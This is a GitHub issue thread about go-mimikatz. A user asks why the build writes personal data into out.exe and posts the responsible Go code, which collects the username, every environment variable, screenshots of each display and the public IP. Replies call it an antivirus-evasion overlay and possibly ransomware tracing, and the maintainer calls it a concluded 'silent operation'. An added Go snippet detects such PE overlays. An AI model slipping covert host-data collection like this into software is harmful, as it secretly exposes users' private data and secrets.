go-mimikatz

Why write personal information to out.exe?

Open shadow1ng opened this issue 1 year ago • 2 comments

package main

import (
	"bytes"
	"image/png"
	"io"
	"log"
	"net/http"
	"os"
	"os/user"
	"runtime"

	"github.com/kbinani/screenshot" // assumed: the issue does not name the screenshot library
)

// checkErr is not shown in the issue; assumed to abort on the first error.
func checkErr(err error) {
	if err != nil {
		log.Fatal(err)
	}
}

// collectHostInfo assembles the blob written into out.exe: a "|*****|" marker,
// home directory, username and display name, every environment variable, a PNG
// of each display, the public IP from myexternalip.com, and GOARCH/GOOS.
func collectHostInfo() *bytes.Buffer {
	thisUser, err := user.Current()
	checkErr(err)
	pkg := bytes.NewBuffer([]byte{})
	pkg.WriteString("|*****|")
	pkg.WriteString(thisUser.HomeDir)
	pkg.WriteString("|||")
	pkg.WriteString(thisUser.Username)
	pkg.WriteString("|||")
	pkg.WriteString(thisUser.Name)
	for _, enVar := range os.Environ() {
		pkg.WriteString(enVar)
		pkg.WriteString("|")
	}
	for index := 0; index < screenshot.NumActiveDisplays(); index++ {
		img, err := screenshot.CaptureRect(screenshot.GetDisplayBounds(index))
		checkErr(err)
		checkErr(png.Encode(pkg, img)) // the posted code dropped this error
		pkg.WriteString("|||")
	}
	resp, err := http.Get("https://myexternalip.com/raw") // no timeout: the build hangs if this host is unreachable
	checkErr(err)
	defer resp.Body.Close()
	ip, err := io.ReadAll(resp.Body)
	checkErr(err)
	pkg.Write(ip)
	pkg.WriteString("|||")
	pkg.WriteString(runtime.GOARCH)
	pkg.WriteString("|||")
	pkg.WriteString(runtime.GOOS)
	return pkg
}

shadow1ng · Jul 13 '22 09:07

Hey 影舞者, this is the overlay technique for statically evading Defender and 360. I also think the information collected is a bit too private, but the data is not sent anywhere, and it gets encrypted.

piiperxyz · Jul 15 '22 07:07
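The reply above says the collected data is appended to the binary as an overlay. A practitioner who wants to verify that claim on a built out.exe can check for data past the last PE section. The following is an added example, not code from go-mimikatz or from anyone in this thread: it parses a PE image with Go's standard debug/pe, reports the overlay offset and size, and additionally looks for the "|*****|" marker from the posted snippet. The marker check assumes the blob is stored in plaintext; if it is encrypted as the reply states, only the overlay size check will fire. The minimal PE image used as input is constructed here and is not an executable.

```go
package main

import (
	"bytes"
	"debug/pe"
	"encoding/binary"
	"fmt"
)

// pkgMarker is the leading delimiter the posted snippet writes before the
// collected host data. Only visible if the blob is stored unencrypted.
const pkgMarker = "|*****|"

// peOverlay parses a PE image and returns the file offset just past the last
// section's raw data plus everything after it (the overlay). A binary straight
// from the linker has an empty overlay; appended data shows up here whatever
// its contents.
func peOverlay(image []byte) (int, []byte, error) {
	f, err := pe.NewFile(bytes.NewReader(image))
	if err != nil {
		return 0, nil, err
	}
	defer f.Close()
	var end uint32
	for _, s := range f.Sections {
		if s.Size == 0 { // uninitialised (.bss-style) sections occupy no file space
			continue
		}
		if e := s.Offset + s.Size; e > end {
			end = e
		}
	}
	if int(end) > len(image) {
		return 0, nil, fmt.Errorf("section data ends at %d, past end of file (%d bytes)", end, len(image))
	}
	return int(end), image[end:], nil
}

// overlayHasPackage reports whether the overlay starts with the plaintext marker.
func overlayHasPackage(overlay []byte) bool {
	return bytes.HasPrefix(overlay, []byte(pkgMarker))
}

// minimalPE is constructed sample input: the smallest layout debug/pe accepts
// (MZ stub, PE signature, COFF header with no optional header, one section
// header, then that section's raw bytes). It is not runnable code.
func minimalPE(sectionData []byte) []byte {
	const peOff = 0x40
	const hdrSize = peOff + 4 + 20 + 40 // signature + COFF header + one section header
	buf := make([]byte, hdrSize)
	copy(buf, "MZ")
	binary.LittleEndian.PutUint32(buf[0x3c:], peOff) // e_lfanew
	copy(buf[peOff:], "PE\x00\x00")
	coff := buf[peOff+4:]
	binary.LittleEndian.PutUint16(coff[0:], 0x8664) // IMAGE_FILE_MACHINE_AMD64
	binary.LittleEndian.PutUint16(coff[2:], 1)      // NumberOfSections; SizeOfOptionalHeader stays 0
	sh := buf[peOff+4+20:]
	copy(sh, ".text")
	binary.LittleEndian.PutUint32(sh[8:], uint32(len(sectionData)))  // VirtualSize
	binary.LittleEndian.PutUint32(sh[12:], 0x1000)                   // VirtualAddress
	binary.LittleEndian.PutUint32(sh[16:], uint32(len(sectionData))) // SizeOfRawData
	binary.LittleEndian.PutUint32(sh[20:], hdrSize)                  // PointerToRawData
	return append(buf, sectionData...)
}

func main() {
	code := []byte{0xcc, 0xcc, 0xcc, 0xcc}
	blob := []byte(pkgMarker + "C:\\Users\\demo|||demo|||Demo User|") // constructed, plaintext for illustration
	samples := []struct {
		name  string
		image []byte
	}{
		{"clean build", minimalPE(code)},
		{"build with appended blob", append(minimalPE(code), blob...)},
	}
	for _, s := range samples {
		off, overlay, err := peOverlay(s.image)
		if err != nil {
			fmt.Printf("%s: %v\n", s.name, err)
			continue
		}
		fmt.Printf("%-24s overlay at %d: %d bytes, marker=%v\n", s.name, off, len(overlay), overlayHasPackage(overlay))
	}
}
```

Run it against a real build by replacing the constructed image with the bytes of out.exe; a non-zero overlay on a binary the Go linker produced directly is the thing to explain, regardless of whether the marker is readable.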

> Hey 影舞者, this is the overlay technique for statically evading Defender and 360. I also think the information collected is a bit too private, but the data is not sent anywhere, and it gets encrypted.

I later looked at the earlier readme: someone used this tool for ransomware, so presumably this is there for tracing purposes.

shadow1ng · Jul 15 '22 07:07

This code is now removed. I put it there as a silent operation, and the operation has now concluded :)

vyrus001 · Sep 14 '22 21:09